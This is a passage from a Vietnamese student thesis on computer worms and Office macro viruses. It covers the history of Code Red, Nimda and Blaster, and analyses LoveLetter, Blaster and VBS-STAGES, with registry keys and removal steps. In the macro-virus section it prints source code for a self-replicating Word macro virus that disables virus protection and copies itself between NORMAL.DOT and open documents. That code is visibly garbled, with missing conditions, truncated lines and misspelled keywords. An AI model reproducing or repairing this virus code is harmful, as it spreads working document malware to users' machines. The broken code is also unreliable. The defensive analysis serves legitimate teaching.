tấn công cũng như những lỗ hổng của các phần mềm, hệ điều hành đã tạo nên những con sâu máy tính có sức công phá rất lớn. Vào năm 2001 sâu Sadmind phát tán trên mục tiêu khác nhau trên hai hệ điều hành khác nhau. Đầu tiên nó khai thác lỗi tràn bộ đệm trên hệ điều hành Sun Solaris và cài đặt phần mềm để tấn công các IIS Server. Khoảng một tháng sau sâu Code red 1 ra đời nó cũng khai thác lỗ hổng này. Worm tự đặt nó trong bộ nhớ và sinh ra trên 100 tiến trình, mỗi một tiến trình là một bản sao gốc của worm. Worm sinh ra danh sách các địa chỉ IP ngẫu nhiên và lấy trên đó 200,000 máy đã bị nhiễm. Một tuần sau đó Code red 2 ra đời lây nhiễm trên 359,000 máy mà không dưới 14 giờ. Vào ngày 18 tháng 9 năm 2001 sâu Nimda là một báo động mới đối với làng worm nó dùng 5 cách khác nhau để phát tán và đưa ra những đoạn mã nhỏ nguy hiểm. Nhiều site bị nghẽn ở cổng 80.450,500 máy chỉ trong vòng 12 giờ, mặc dù không có kĩ thuật lây nhiễm nào là mới. Trần Thị Thúy_ Lớp CT901 34
  38. Khóa luận tốt nghiệp chống Khủng khiếp hơn nữa vào tháng 8 năm 2003 xuất hiện một loại sâu có tên Blaster với sức lây nhiễm cực nhanh, người ta gọi đó là tuần lễ tồi nhất của lịch sử worm, mục tiêu của loại sâu này chính là khai thác lỗi Windows DCOM RPC, càng mạnh hơn nữa đó chính là Sobig.F. 2.2. Macro virus Hiện nay đã có rất nhiều sâu sử dụng các macro. Lợi dụng tính năng của nó là có thể tự động chạy một đoạn mã khi có một tác động của con người đến file văn bản. Điển hình là worm macro virus Melissa đã dùng kĩ thuật macro khá hoàn hảo nhằm mục đích lây nhiễm qua con đường email. 2.2.1. Khái niệm macro : Macro – MS Office (trong phần này và tiếp theo sẽ gọi tắt là macro) là chương trình được viết với các ngôn ngữ như WordBasic, VBA (Visual Basic for Application) để tự động thực hiện một số thao tác bên trong một ứng dụng nền của Microsoft Office như Microsoft Word, Excel, PowerPoint. Các macro VBA được xây dựng ở dạng các thủ tục (procedure) hoặc các hàm (function). Một chương trình viết trên ngôn ngữ VBA có thể truy cập tới các document, worksheet, Microsoft Outlook hay một đối tượng ứng dụng nào đó để đọc hoặc ghi dữ liệu. Như vậy, nếu những macro được thiết kế có khả năng tự sao chép chúng từ chỗ này sang chỗ khác, thì chúng trở thành các virus máy tính, bởi chúng đã có khả năng lây nhiễm, một đặc tính quan trọng của virus máy tính. Ngoài các macro do người sử dụng tự thiết kế, trong các ứng dụng của Microsoft Office có một số macro được tự động thi hành như : AutoExec : Được thi hành mỗi khi chương trình ứng dụng được khởi động. AutoNew : Được thi hành để tạo một tài liệu/văn bản mới. AutoOpen : Được thi hành để mở một tài liệu đã có. AutoClose : Được thi hành để đóng một tài liệu đang mở. AutoExit : Được thi hành mỗi khi thoát khỏi ứng dụng. Trần Thị Thúy_ Lớp CT901 35
  39. Khóa luận tốt nghiệp chống 2.2.2. Phương thức lây nhiễm Các kỹ thuật lây nhiễm của các virus macro khá đa dạng, phong phú, chủ yếu dựa trên các tính năng sao chép các macro từ file văn bản này sang file văn bản khác mà các ứng dụng nền hỗ trợ. Mỗi đối tượng VBComponent có một đối tượng con là CodeModule, cho phép thao tác trên các module chương trình có trong file văn bản. Virus có thể sử dụng các thuộc tính, phương thức sẵn có để thao tác trực tiếp trên các module này 1. Thông qua thành phần VBProject của các đối tượng Microsoft Office. Các macro được lưu trữ ngay trong file đối tượng (Document, WorkSheet, E-Mail) hoặc trong các tệp định dạng (Template) và được tham chiếu qua đối tượng Document hoặc WorkSheet. Mỗi đối tượng Document đều có thành phần VBProject. Trong VBProject có Container Object, là một VBComponents, chứa các thành phần VBA của file văn bản. 2. Sử dụng các dịch vụ Import và Export. Trong đối tượng VBComponents có một phương thức là Import, cho phép nhập thêm các thành phần VBA (Form/Module/Class) từ một file. Mỗi thành phần VBA VBComponent cũng có một phương thức là Export cho phép xuất chính nó ra thành một file (.FRM, .BAS, .CLA). Mỗi khi muốn sao chép các chương trình virus sang một file văn bản mới, trước hết sử dụng lệnh Export để xuất chương trình ra một file, sau đó sử dụng lệnh Import để nhập chương trình virus vào file văn bản mới. 3. Sử dụng OrganizerCopy. Phương thức OrganizerCopy của đối tượng Application có thể được sử dụng để sao chép chương trình virus sang một file văn bản khác. Giả sử trong file NormalTemplate đã có virus macro TEST01 (tên module virus – macro là TEST01 trong VBA) Sub SaveDocument() On Error Resume Next DaNhiem = False For Each obj In ActiveDocument.VBProject.VBComponents Trần Thị Thúy_ Lớp CT901 36
  40. Khóa luận tốt nghiệp chống If obj.Name = "TEST01" Then DaNhiem = True Next obj If DaNhiem = False Then Application.OrganizationCopy Source = NormalTemplate.FullName, Destination = ActiveDocument, Name = "MacVirus", Object = wdOrganizerObjectProjectItems End If End Sub Thủ tục copy virus từ một file tài liệu đã bị nhiễm virus vào file NormalTemplate như sau : Sub SaveTemplate() On Error Resume Next DaNhiem = False For Each obj In NormalTemplate.VBProject.VBComponents If obj.Name = "TEST01" Then DaNhiem = True Next obj If DaNhiem = False Then Application.OrganizationCopy Source = ActiveDocument.FullName Destination = NormalTemplate.FullName Name = "MacVirus" Object = wdOrganizerObjectProjectItems End If End Sub 2.2.3. Ví dụ mình họa Macro Virus được xây dựng trong ví dụ này là virus lây lan trong các tệp tài liệu (document). Tệp được dùng như là môi trường để lây lan ở đây là tệp Trần Thị Thúy_ Lớp CT901 37
  41. Khóa luận tốt nghiệp chống NORMAL.DOT. Tệp này được chọn làm công cụ truyền virus là vì hầu hết các Document đều sử dụng những thông tin chung về định dạng từ tệp này. Nguyên lý hoạt động ở đây cũng rất đơn giản. Giả sử một tệp X đang được kích hoạt đã nhiễm virus. Có hai khả năng xảy ra : Tệp X là tệp NORMAL.DOT, Winword khi làm việc với một tệp khác, sẽ để đối tượng lây lan sang tài liệu đang được sử dụng (Active Document). X là một tệp Document, đối tượng lây nhiễm sẽ là NORMAL.DOT. 1. Trường hợp 1 : X là tệp Normal.Dot, khi này macro đầu tiên được kích hoạt sẽ phải là Macro Open, do phải mở Document (New or Old) công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Open. Lưu ý rằng đoạn chương trình virus gắn vào trong Normal.dot là kèm với macro Open 2. Trường hợp 2 : X là tệp Active Document, lúc này macro được kích hoạt nên là Macro Close, vì Document đã được mở trước đó. Công việc phải làm là thi hành đoạn chương trình kèm với Auto Macro Close. Active Macro Close 1. Control MACRO := False 2. Option.ConfirmConversions := False 3. Option.VirusProtection := False 4. Option.SaveNormalPrompt :=False 5. AD := ActiveDocument.VBProject.VBComponents.Item(1) 6. NT := NormalTemplate.VBProject.VBComponents.Item(1) 7. If AD isn‟t Infected Then F := AD, F1 := NT 8. If NT isn‟t Infected Then F :=NT, F1 :=AD 9. If NT is Infected and AD is Infected Then a) Delete all lines in F.CodeModule b) Put the virus‟s sign into F c) F‟s Infection := TRUE a) You are in F1 now ! b) Delete all First Empty Lines in F1‟s CodeModule Trần Thị Thúy_ Lớp CT901 38
  42. Khóa luận tốt nghiệp chống c) Insert String "Private Sub Document_Close()" into 1st Line in F d) Copy from 2nd to CountOfLine from F1 to F Else If now you are in AD then Insert String "Hi, How are you ? ". Phương án 1, lây vào Normal.dot và Active Document với macro CLOSE. Private Sub Document_Close() On Error Resume Next CommandBars ("Tools").Controls("Macro").Enabled = True „False Options.ComfirmConversions = False Option.VirusProtection = False Option.SaveNormalPrompt = False Set AD = ActiveDocument.VBProject.VBComponents.Item(1) Set NT = NormalTemplate.VBProject.VBComponents.Item(1) dt=2 DoIn = False If AD.Name 0 Then F.CodeModule.DeleteLines 1, Sd F.Name = "Daisy" If DoIn = True Then Set F = NT Set F1 = AD DoIn = True End If If DoIn = False Then Go To Destroy Sd = F.CodeModule.CountLines Trần Thị Thúy_ Lớp CT901 39
  43. Khóa luận tốt nghiệp chống If Sd > 0 Then F.CodeModule.DeleteLines 1, Sd F.Name = "Daisy" If DoIn = True Then Do While F1.CodeModule.Lines(1,1)="" F1.CodeModule.DeleteLines 1 Loop F.CodeModule.AddFromString ("Private Sub Ducoment_Close()") Do While F1.CodeModule.Lines(dt,1) "Daisy" Then Set F = AD Trần Thị Thúy_ Lớp CT901 40
  44. Khóa luận tốt nghiệp chống Set F1 = NT DoInD = True End If If NT.Name 0 Then F.CodeModule.DeleteLines 1, Sd F.Name = "Daisy" If DoInD = True Or DoInN = True Then Do While F1.CodeModule.Lines(1,1)="" F1.CodeModule.DeleteLines 1 Loop If DoInD Then F.CodeModule.AddFromString("Private Sub Document_Close()") Else F.CodeModule.AddFromString ("Pivate Sub Document_Open()") End if Do While F1.CodeModule.Lines(dt,1) <> "" F.CodeModule.InsertLines dt, F1.CodeModule.Lines(dt,1) dt = dt + 1 Loop End If Destroy : Selection.TypeText Date & "Hi, I am here ! " End Sub Trần Thị Thúy_ Lớp CT901 41
  45. Khóa luận tốt nghiệp chống 2.3. Phân tích cách thức hoạt động của một số sâu 2.3.1.Loveletter VBA.LoveLetter và các dạng khác của loại virus này. Loại virus này có khoảng 82 biến thể. Dạng cuối cùng đó là VBS.Loveletter.CN Quá trình : Trung tâm an ninh mạng Symantec có uy tín trên toàn cầu bắt đầu nhận được yêu cầu từ phía người dùng về loại worm này vào một buổi sáng ngày 4 tháng 5 năm 2000. Loại worm này bắt nguồn từ Manila, Philippines. Nó có sức lan truyền rất rộng, và lây nhiễm hàng triệu máy. Loại sâu này đó là tự động gửi đến địa chỉ email trong hộp địa chỉ của Microsoft Outlook và cũng lây lan sang phòng chat dùng MIRC. Loại worm này viết đè lên file từ các trình điều khiển từ xa, bao gồm các loại file có phần mở rộng : .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .wav, .txt, .gif, .doc, .htm, .html, .xls, .ini, .bat, .com, .avi, .qt, .mpg, .mpeg, .cpp, .c, .h, .swd, .psd, .wri, .mp3, and .mp2. Hầu hết các file được thay đổi bằng mã nguồn của worm, nó thêm đuôi mở rộng .vbs vào mỗi file. Ví dụ, image.jpg trở thành image.jpg.vbs. Với những file có phần mở rộng là .mp2 .mp3 thì không bị phá hủy. Mặt khác VBS.Loveletter cũng download một chú ngựa Trojan từ một website. Cách thức hoạt động của loại sâu này : (threat assessment) Wild Số lượng máy nhiễm : 0 – 49 Số lượng site nhiễm : 3 – 9 Phân bố địa lý : cao Mức độ thiệt hại (đe dọa) : bình thường Khả năng gỡ bỏ : bình thường Thiệt hại (damage) : Trần Thị Thúy_ Lớp CT901 42
  46. Khóa luận tốt nghiệp chống Payload trigger : tấn công qua thư điện tử. Payload : ghi đè lên file. Phạm vi thư điện tử : Tự nó gửi đến tất cả các địa chỉ có trong hộp địa chỉ Outlook. Thay đổi của file : Ghi đè vào file có phần mở rộng sau : .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .wav, .txt, .gif, .doc, .html, .xls, .ini, .bat, .com, .mp3, .and, .mp Chúng có thể bị phát hiện bởi những phần mềm antivirus. Degrades performance : Làm giảm thiểu khả năng của email server Sự phát tán (distribution) Chủ đề của email (subject of mail) : ILOVEYOU Tên của phần đính kèm (name of attachment) : Love – letter – for- you.txt.vbs Kích thước đính kèm : 10,307 bytes Hướng chia sẻ (shared drives) : Viết đè lên file đã được xác định trên mạng Kiểu lây nhiễm : Viết lên file có phần mở rộng là : .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .wav, .txt, .gif, .doc, .htm, .html, .xls, .ini, .bat, .com, mp3, and .mp2. Chi tiết kỹ thuật : Khi hoạt động, worm tự nó sao chép tới thư mục \Windows\System cả mskernel32.vbs và LOVE-LETTER-FOR-YOU.TXT.vbs và tới thư mục \Windows file Win32dll.vbs nó kiểm tra sự có mặt của Winfat32.exe trong thư mục \Windows\System Nếu file này không tồn tại, worm sẽ đặt trình IE khởi động trang web với win-bugsfix.exe.Site này sẽ bị bắt. Nếu file này tồn tại, worm sẽ tạo khóa sau : HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN- BUGSFIX Trần Thị Thúy_ Lớp CT901 43
  47. Khóa luận tốt nghiệp chống Và thi hành trong suốt quá trình khởi động hệ thống. Khi trình duyệt khởi động thì nó sẽ thay thế bằng một trang rỗng Với mỗi một ổ đĩa, gồm cả ổ đĩa mạng, virus sẽ tìm cách lây nhiễm vào file có phần mở rộng là .vbs và .vbe. Worm cũng tìm kiếm các file có phần mở rộng .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .wav, .txt, .gif, .doc, .html, .xls, .ini, .bat, .com, .mp3, .and, .mp2. Khi các loại file này đã được tìm thấy Worm sẽ làm việc như sau : Ghi đè lên tất cả các file có phần mở rộng (.js, .jse ) với phần mã đã có virus. Sau đó nó tạo một văn bản sao của file và thêm phần mở rộng .vbs vào tên file. Ví dụ, nếu tên file là House_pics.jpg, thì file đã được ghi đè có tên là House_pics.jpg.vbs. Sau đó file gốc sẽ bị xóa. Những file này phải bị xóa rồi sau đó lưu lại từ bản sao dự phòng. Tạo bản sao cho tất cả các file có phần mở rộng .mp3 và .mp2. Sau đó ghi đè lên với đoạn mã đã nhiễm virus và thêm phần mở rộng .vbs vào tên file. Tiếp theo thay đổi thuộc tính của file gốc .mp3 và .mp2 vẫn không bị thay đổi trên ổ cứng. Các file đã thay đổi sẽ bị xóa. Khuyến cáo : Không nên cố gắng thực thi các file mà đã bị ghi đè hoặc đã bị thay đổi tên bởi worm. Nếu làm như vậy worm sẽ hoạt động lại Worm cũng phát tán bằng con đường khác bằng cách tạo ra file Script.ini trong thư mục chứa chương trình MIRC. File script này gửi file LOVE- LETTER-FOR-YOU.HTM cho các người dùng khác trong cùng chatroom (phòng chat) Worm dùng cách gọi các hàm MAPI đến chương trình Microsoft Outlook và tạo các thông điệp thông qua tất cả địa chỉ có trong hộp thư của Outlook. Worm dùng Windows registry để giữ một phần của số địa chỉ nào mà được gửi thông điệp, do vậy mỗi địa chỉ chỉ được gửi có một lần. Trần Thị Thúy_ Lớp CT901 44
  48. Khóa luận tốt nghiệp chống Chủ đề của thông điệp là : ILOVEYOU Thân của thông điệp là : kindly check the attached LOVELETTER coming from me. File đính kèm vào thông điệp là LOVE-LETTER-FOR-YOU.TXT.vbs Cuối cùng virus gửi một file LOVE-LETTER-FOR-YOU.HTM đến thư mục \Windows\System Bảng tóm tắt các đầu vào registry đã bị thay đổi : Các khóa registry có thể bị thêm vào : HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\RunServices\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run\ESKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\RunServices\ES32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run\WINFAT32 Trần Thị Thúy_ Lớp CT901 45
  49. Khóa luận tốt nghiệp chống HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run\WIN-BUGFIX Một hoặc một số chương trình bị thêm khóa như : HKEY_USERS\ \Software\Microsoft\ Windows\CurrentVersion\Run Các khóa registry sau có thể bị xóa : HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Policies\Network\HideSharePwds HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Policies\Network\DisablePwdCaching HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Policies\Network\HideSharePwds HKLM\Software\Microsoft\Windows\ CurrentVersion\Policies\Network\DisablePwdCaching Thêm vào đó hàng trăm các giá trị registry DWORD có tiềm năng được tạo ra trong HKEY_USERS\ \SOFTWARE\Microsoft\WAB Trên cơ sở có bao nhiêu thông điệp thư điện tử được gửi ra ngoài. Những khóa này sẽ được phân biệt cho mỗi máy Các phiên bản khác của LOVELETTER Trung tâm an ninh mạng đã phát hiện ra tới 82 phiên bản của virus loveletter VBS.LoveLetter.A o Tên phát hiện : VBS.LoveLetter.A(1) o Chủ đề : ILOVEYOU o Thân thông điệp : kindly check the attached LOVELETTER o File đính kèm : LOVE-LETTER-FOR-YOU.TXT.vbs VBS.LoveLetter.B (Lithuania) o Tên phát hiện : VBS.LoveLetter.B(1) hoặc VBS.LoveLetter.B(HTM) Trần Thị Thúy_ Lớp CT901 46
  50. Khóa luận tốt nghiệp chống o Chủ đề thông điệp : Susitikim shi vakara kavos puodukui o Thân : giống loài 1 o File đính kèm : giống loài 1 Và còn rất nhiều, đa số là giống nhau và đều dựa trên một số kỹ thuật chung đó là vừa hoạt động như một sâu thực thụ nhưng cũng dùng cả kỹ thuật dùng virus đính kèm file Mặc dù như vậy sâu loveletter vẫn cần sự tác động của con người là phải mở thư và tệp đính kèm để kích hoạt sự lây lan. Các biện pháp để ngăn chặn virus LoveLetter. 1. Bạn không nên mở e-mail có cái tựa đề (subject) quá đã là "ILOVEYOU", bất luận do ai gửi tới. Bởi vì sau khi xâm nhập vào máy vi tính của một người bạn, thậm chí người yêu dấu của bạn, con virus này sẽ lấy địa chỉ e-mail trong sổ địa chỉ của người đó mà gửi nó cho bạn. Nếu đã lỡ nhận e- mail có tiêu đề như vậy, hãy lập tức delete nó ra khỏi hệ thống. Nhớ xóa cả trong thư mục lưu các thư vừa delete (trong Outlook Express là folder Deleted Items). 2. Nếu đã nhận e-mail "ILOVEYOU" rồi, bạn hãy delete nó ngay và liên lạc với người gửi để báo tin cho người ấy biết máy người ấy đã bị con bọ Love làm hại rồi. 3. Download các chương trình phát hiện và diệt virus LoveLetter. Hãy luôn update phần mềm antivirus của bạn với phiên bản mới nhất. Một nguyên tắc sống còn là không bao giờ mở một file attachment đính kèm e-mail trước khi quét virus nó. Cũng không bao giờ mở một file đính kèm nhận từ một địa chỉ lạ. 4. Nếu bạn không có nhu cầu sử dụng Visual Basic scripting trong công việc hàng ngày, xin hãy tắt chức năng này đi. Bởi virus LoveLetter được viết bằng ngôn ngữ Visual Basic. Ðể tắt chức năng này, bạn làm như sau : Vào Control Panel và click lên item Add/Remove Programs Mở tab Windows Setup Trần Thị Thúy_ Lớp CT901 47
  51. Khóa luận tốt nghiệp chống Click double lên mục Accessories để mở chi tiết. Bỏ dấu kiểm trước item Windows Scripting Host Click OK. Nếu máy đã bị nhiễm virus LoveLetter : Tốt nhất là dùng một phần mềm antivirus đã được cập nhật khả năng trị LoveLetter để quét và diệt nó khỏi máy vi tính. Ngoài ra, bạn có thể delete một cách triệt để (cả trong folder Delete Items) e-mail chứa virus, rồi sau đó xóa khỏi máy mình các file sau đây : MSKernel32.vbs trong thư mục WINDOWS\SYSTEM Win32DLL.vbs trong thư mục WINDOWS LOVE-LETTER-FOR-YOU. TXT.vbs trong thư mục WINDOWS\SYSTEM WinFAT32.EXE trong thư mục Internet download script.ini trong thư mục MIRC Nhớ xóa cả trong thùng rác Recycle Bin lẫn thư mục bảo vệ file của NULL (nếu có sử dụng chức năng này) Sử dụng các công cụ phần mềm AntiVirus. Trần Thị Thúy_ Lớp CT901 48
  52. Khóa luận tốt nghiệp chống 2.3.2. Phân tích sâu Blaster Thông tin lấy từ trang Symatec W32.Blaster. Worm là một loại sâu khai thác lỗi DCOM RPC (được Microsoft mô tả trong Security Bulletin MS03-026) dùng cổng TCP port 135. Các mục tiêu của sâu này là windows 2000 và windows XP. Loại sâu này cố gắng download file msblast.exe đến thư mục %WinDir%\system32 sau đó chạy nó Một số thông tin Số lượng máy nhiễm : hơn 1000 Số site nhiễm : hơn 10 Sự phân bố về mặt địa lý : cao Dấu hiệu đe dọa : bình thường Sự thiệt hại Payload trigger : nếu ngày là ngày thứ 16 của tháng cho đến cuối tháng trước tháng 8, và những ngày thứ 16 cho đến 31 tháng 12. Payload : thực hiện tấn công từ chối dịch vụ. Phân bổ Cổng : TCP135, TCP4444, UDP69. Mục tiêu lây nhiễm : Máy bị lỗi DCOM RPC. Chi tiết về mặt kĩ thuật : W32 hoạt động như sau : 1. Kiểm tra xem máy tính đã bị nhiễm chưa. Nếu đã nhiễm thì nó sẽ không lây vào máy lần thứ hai. 2. Thêm giá trị : "windows auto update " ="msblast.exe" Vào khóa registry : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run Trần Thị Thúy_ Lớp CT901 49
  53. Khóa luận tốt nghiệp chống Mục đích là khi máy khởi động lại, worm sẽ tự chạy. 3. Sinh địa chỉ IP và cố gắng tìm cách lây nhiễm vào máy có địa chỉ đó. Địa chỉ IP được sinh ra theo thuật toán : 40% thời gian, sinh IP ở dạng A.B.C.0, với điều kiện A và B bằng nhau đối với hai phần đầu của địa chỉ bị nhiễm. C cũng được tính toán. Tuy nhiên với 40% thời gian worm kiểm tra C có lớn hơn 20 hay không. Nếu vậy, một giá trị ngẫu nhiên nhỏ hơn 20 được trừ đi từ C. Với một địa chỉ IP được tính toán, worm sẽ tìm và khai thác với địa chỉ A.B.C.0 Worm sẽ tăng IP lên một, cố gắng tìm và khai thác các máy tính khác trên cở sở địa chỉ IP mới, đến 254. Với 60% còn lại là địa chỉ ngẫu nhiên 4. Gửi dữ liệu trên cổng TCP 135 có thể khai thác lỗ hổng DCOM RPC. Nó gửi một hoặc hai loại dữ liệu : Hoặc khai thác Windows XP hoặc Windows 2000 Với 80% thời gian, Windows XP dữ liệu được gửi, còn lại 20% cho win 2000 Chú ý : o Mạng con sẽ bão hòa với nhu cầu từ cổng 135 o Trong khi W32.Blaster.Worm không thể phát tán trên Windows NT hoặc Windows Server 2003, những hệ điều hành này có thể phá được. Tuy nhiên, nếu worm được điều khiển tại chỗ và chạy máy tính có hệ điều hành này, nó vẫn có thể chạy và phát tán. Nhờ vào sự ngẫu nhiên là cách để worm khai thác dữ liệu, cái này có thể là nguyên nhân máy chủ RPC để phá hủy nếu máy tính nhận dữ liệu lỗi Nếu máy chủ RPC bị phá vỡ, thì những chương trình mặc định dưới nền XP và 2003 server khởi động lại. Trần Thị Thúy_ Lớp CT901 50
  54. Khóa luận tốt nghiệp chống 5. Dùng chương trình cmd.exe để tạo tiến trình ẩn từ xa tiến trình này sẽ nghe trên cổng TCP 4444 cho phép kẻ tấn công phát ra những câu lệnh từ xa trên hệ thống bị nhiễm. 6. Nghe trên cổng UDP 69. Khi worm nhận một yêu cầu từ máy tính nó sẽ kết nối và sử dụng lỗi DCOM RPC, gửi msblast.exe và khởi động quá trình hoạt động. 7. Nếu ngày hiện thời là ngày thứ 16 đến cuối tháng từ tháng 1 đến tháng 8, hoặc tháng hiện thời là 10 đến 12, worm sẽ tìm cách thực hiện kiểu tấn công từ chối dịch vụ trên hệ thống windows update. Tuy nhiên, để tấn công kiểu DOS thì những điều kiện sau phải đúng : Worm chạy trên máy dùng Windows XP và cũng bị nhiễm hoặc khởi động lại trong suốt quá trình tấn công. Worm chạy trên Windows 2000 bị nhiễm trong suốt quá trình và không bị khởi động lại từ khi nó bị nhiễm. Worm chạy trên Windows 2000 khởi động lại khi nó bị nhiễm, trong suốt quá trình payload, và đăng nhập quyền quản trị 8. Quá trình tấn công DOS theo các tính chất sau : Một yêu cầu ngập lụt trên cổng 80 của chương trình Windowsupdate.com Gửi các gói dữ liệu trên cổng 50 HTTP mỗi giây Mỗi gói có độ dài là 40 bytes Nếu worm không thể tìm thấy đầu vào DNS cho chương trình Windowsupdate.com, thì dùng địa chỉ đích 255.255.255.255 Một số thuộc tính được bố trí của headers TCP và IP là : Định danh IP là 256. Thời gian tồn tại là 128 Địa chỉ nguồn là a.b.x.y điều kiện a.b lấy từ IP của máy trạm và x.y là ngẫu nhiên. Trong một số trường hợp a, b là ngẫu nhiên. Trần Thị Thúy_ Lớp CT901 51
  55. Khóa luận tốt nghiệp chống o Địa chỉ đích là dns của Windowsupdate.com o Cổng nguồn TCP nằm giữa 1000 đến 1999 o Cổng đích 80 TCP o Số TCP tuần tự luôn có 2 byte thấp đặt là 0,2 byte cao là ngẫu nhiên. o Độ dài TCP = 16384 Worm chứa đoạn text sau, nhưng nó không bao giờ hiển thị. " I just want to say LOVE YOU SAN !! billy gates why do you make this possible ? Stop making money and fix your software !!" 2.2.3. VBS-STAGES.A Bí danh : VBS-STAGES.A Ngày phá hoại : Bất cứ ngày nào Tác hại : Xóa các file (kể cả REGEDIT) Tự động lây lan qua Outlook, Pirch và mIRC. Kích thước virus : 39,936 bytes Mô tả : VBS-STAGES.A là một loại Internet Worm, lây nhiễm đặc biệt bằng cách lợi dụng các chương trình có sẵn như Microsoft Outlook, Pirch, mIRC và thậm chí là cả các ổ cứng được ánh xạ (map) trên máy. Giống như các con sâu dùng ngôn ngữ VB khác, STAGES.A có thể ẩn náu trong một mẩu file đính kèm trong e-mail (tên tệp là LIFE_STAGES.TXT.SHS). File này có thể làm cho người nhận e_mail dễ dàng tin rằng đây chỉ là một văn bản (text) bình thường, vì phần mở rộng của file không hiện ra mà hiện biểu tượng của một file.txt. Khi file này được kích hoạt, nó sẽ gọi Notepad mở một đọan text khôi hài về các giai đoạn trong cuộc đời của một người đàn ông và một người đàn bà. Chi tiết : Khi file gửi đính kèm (LIFE_STAGES.TXT.SHS) được mở, người dùng sẽ bị đánh lừa bởi một đoạn văn bản. Cùng lúc đó, con sâu này thực hiện các Trần Thị Thúy_ Lớp CT901 52
  56. Khóa luận tốt nghiệp chống hành vi phá hoại bằng cách chèn các thông tin của nó vào Windows Registry để Windows kích hoạt nó mỗi khi khởi động. HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\RunServices\ScanReg= "C:\WINDOWS\WSCRIPT.EXE C:\WINDOWS\SYSTEM\SCANREG.VBS " Con sâu này còn ghi file C:\WINDOWS\SYSTEM\SCANREG.VBS có chứa mã nguồn của nó dưới dạng file .VBS Nó còn tạo ra các khóa sau để tự kích hoạt mỗi khi ICQ khởi động : HKEY_USERS\DEFAUL\Software\Mirabilis\CQ\Agent\Apps\ICQ|Parameter S= "C:\RECYCLED\DBINEX.VBS" HKEY_USERS\DEFAUL\Software\Mirabilis\ICQ\Agent\Apps\ICQ\Path= "C:\WINDOWS \WSCRIPT.EXE" HKEY_USERS\DEFAUL\Software\Mirabilis\ICQ\Agent|Apps\ICQ\Starup= "C:\WINDOWS ". Để lây lan qua các kênh hội thoại trực tuyến, nó tạo ra file SOUND32B.DLL, một file phụ MIRC.INI được gọi, và chứa các đoạn mã để gửi file LIFE_STAGES.TXT.SHS khi kết nối đến máy chủ hội thoại trực tuyến. Các file này có thể được chương trình quét virus của Trend phát hiện dưới cái tên IRC_STAGES.A Sau đó, con sâu sẽ gửi một e-mail tới các địa chỉ có trong sổ địa chỉ của máy đã bị nhiễm Con sâu còn xóa cả file REGEDIT.EXE và chuyển nó vào trong Recycle Bin với cái tên RECYLED.VXD. File này được kích hoạt khi người dùng mở các file REGEDIT. Để làm được điều này, virus đã thay đổi các thông tin sau trong Windows Registry : HKEY_LOCAL_MACHINE\Software\CLASSES\regfile\DefaultIcon Value "@" : Từ "C:\RECYCLED\RECYCLED.VXD,1" Trần Thị Thúy_ Lớp CT901 53
  57. Khóa luận tốt nghiệp chống HKEY_LOCAL_MACHINE\Software\CLASSES\regfile\shell\open\command Value "@" : Từ " regedit.exe" "%1" VBS_STAGES.A còn tạo ra các file với các tên ngẫu nhiên trong hệ thống và trên tất cả các ổ cứng. Ví dụ c:\window\machne name.acl v.v Quy tắc thành lập các tên file ngẫu nhiên của virus là : (Ramdom1+Ramdom2+Ramdom3)+TXT+SHS. Trong đó Random1 là một trong các từ sau : IMPORTANT, INFO, REPORT, SECRET, UNKNOWN. Random2 là một trong 2 ký tự "-" hoặc "_" Random3 là một số bất kỳ từ 0 đến 999. Giải pháp loại trừ STAGES.A Mở REGEDIT : 1. Bấm vào các dấu "+" ở bên cạnh các mục HKEY_LOCAL_MACHINE : Software, Microsoft, Windows, CurrentVersion, RunServices. 2. Trong cửa sổ phía phải, tìm các khóa có giá trị sau : "C:\WINDOWS\WSCRIPT.EXE C:\WINDOWS\SYSTEM\SCAN-REG.VBS" 3. Nhấn chuột phải vào các khóa này và chọn Delete để xóa chúng. 4. Lặp lại các bước 1, 2, 3 với các mục sau : HKEY_USERS\DEFAULT\Software\Mirabilis\ICQ\Agent\Apps/ICQ Tìm khóa có giá trị : Parameters="C\RECYCLED\DBINDEX.VBS" Path = "C:\WINDOWS\WSCRIPT.EXE" và Startup = " C:\WINDOWS" 5. Lặp lại các bước 2 và 3 đối với : HKEY_LOCAL_MACHINE\Software\CLASSES\regedit\DefaultIcon Khóa có giá trị " C:\RECYCLED\RECYCLED.VXD,1" 6. Nhấp đúp chuột vào khóa vừa tìm được để gõ vào giá tri mới : Trần Thị Thúy_ Lớp CT901 54
  58. Khóa luận tốt nghiệp chống "C:\WINDOWS\REGEDIT.exe,1" 7. Lặp lại các bước 6 và 7 đối với : HKEY_USERS\DEFAULT\Software\CLASSES\regfile\sgell\open\command 8. Thoát khỏi Registry Editor. 9. Khởi động lại máy. 10. Quét virus bằng các chương trình quét virus và xóa các file bị nhiễm 11. Sao chép file regedit.exe từ một máy tính sạch Trần Thị Thúy_ Lớp CT901 55
